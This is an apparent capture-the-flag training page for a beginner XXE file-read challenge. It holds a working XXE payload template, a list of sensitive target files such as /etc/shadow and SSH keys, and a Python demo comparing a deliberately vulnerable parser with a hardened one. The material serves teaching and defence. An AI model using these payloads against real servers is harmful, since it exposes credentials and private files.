OWASP TOP 10
Basic XXE - File Read (Beginner, 100 points)
Challenge Description

This application parses user-supplied XML data without properly disabling external entity processing. Your goal is to craft an XXE payload that reads local files from the server.

Objective: Use XXE injection to read the flag from the server's file system. The flag format is FLAG{...}
XML Parser

Submit XML to the vulnerable parser:

Server File System (for reference)

These files exist on the simulated server:

/etc/hostname
/etc/passwd
/etc/shadow
/flag.txt
/proc/self/environ
/root/.ssh/id_rsa
/var/log/auth.log
/var/www/app/.env
/var/www/app/config/database.yml
XXE Syntax Reference

Basic structure (declare an external general entity in the internal DTD subset, then reference it in element content; the parser replaces the reference with the file's contents):

<!DOCTYPE root [
  <!ENTITY name SYSTEM "file:///absolute/path">
]>
<root>&name;</root>

Note the three slashes: the URL scheme is file:// and the absolute path supplies the leading slash, so /flag.txt becomes file:///flag.txt.

Common protocols:

  • file:// - Read local files from the server (absolute path, e.g. file:///etc/passwd)
  • http:// - Make HTTP requests from the server (SSRF, or out-of-band exfiltration to a host you control)
  • php:// - PHP stream wrappers (PHP only), e.g. php://filter/convert.base64-encode/resource=/etc/passwd returns the file base64-encoded so that characters such as < or & in it do not break the XML
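The following is an added example, not code from the challenge page or its server: a deliberately vulnerable XML parser built on Python's standard-library xml.sax, next to the same parser with external entity resolution disabled, plus a builder for the file-read payload shown in the syntax reference. The "flag" file is constructed in a temporary directory so the demo runs offline; the function and file names (build_xxe_payload, parse_xml, write_fake_flag, the FLAG{constructed-demo-flag} value) are this example's own, not the challenge's.

```python
# Added example (not from the challenge page): vulnerable vs hardened XML
# parsing with Python's stdlib xml.sax, exercised with a file-read XXE payload.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def build_xxe_payload(path: str, entity: str = "xxe") -> str:
    """Classic file-read payload: declare an external general entity whose
    SYSTEM identifier is a file:// URL, then reference it in element content.
    An absolute path produces the three-slash form, e.g. file:///flag.txt."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE root [\n"
        f'  <!ENTITY {entity} SYSTEM "file://{path}">\n'
        "]>\n"
        f"<root>&{entity};</root>\n"
    )


class TextCollector(ContentHandler):
    """Collects character data; an expanded external entity appears here as text."""

    def __init__(self) -> None:
        super().__init__()
        self.parts = []

    def characters(self, content: str) -> None:
        self.parts.append(content)

    def text(self) -> str:
        return "".join(self.parts)


def parse_xml(xml_text: str, resolve_external_entities: bool) -> str:
    """Parse untrusted XML and return the text found inside the root element.

    resolve_external_entities=True reproduces the challenge's bug: expat is told
    to follow SYSTEM identifiers, and xml.sax's default entity resolver hands the
    identifier to urllib, so file:// (and http://) URLs are fetched and parsed
    into the document. False is the hardened setting (Python's default since
    3.7.1); the entity reference is then skipped and contributes no text.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return handler.text()


def write_fake_flag(flag: str = "FLAG{constructed-demo-flag}") -> str:
    """Create a constructed stand-in for the server's /flag.txt; return its path."""
    directory = tempfile.mkdtemp(prefix="xxe-demo-")
    path = os.path.join(directory, "flag.txt")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(flag + "\n")
    return path


def run_demo() -> dict:
    """Send the same payload to both parsers and report what each returned."""
    path = write_fake_flag()
    payload = build_xxe_payload(path)
    return {
        "payload": payload,
        "vulnerable": parse_xml(payload, resolve_external_entities=True).strip(),
        "hardened": parse_xml(payload, resolve_external_entities=False).strip(),
    }


if __name__ == "__main__":
    result = run_demo()
    print(result["payload"])
    print("vulnerable parser returned:", repr(result["vulnerable"]))
    print("hardened parser returned:  ", repr(result["hardened"]))
```

The hardened form only turns off external general entity resolution; for a real service the stronger fix is to reject any input that carries a DOCTYPE at all (the defusedxml package does this for the stdlib parsers), which also closes off parameter entities and entity-expansion denial of service.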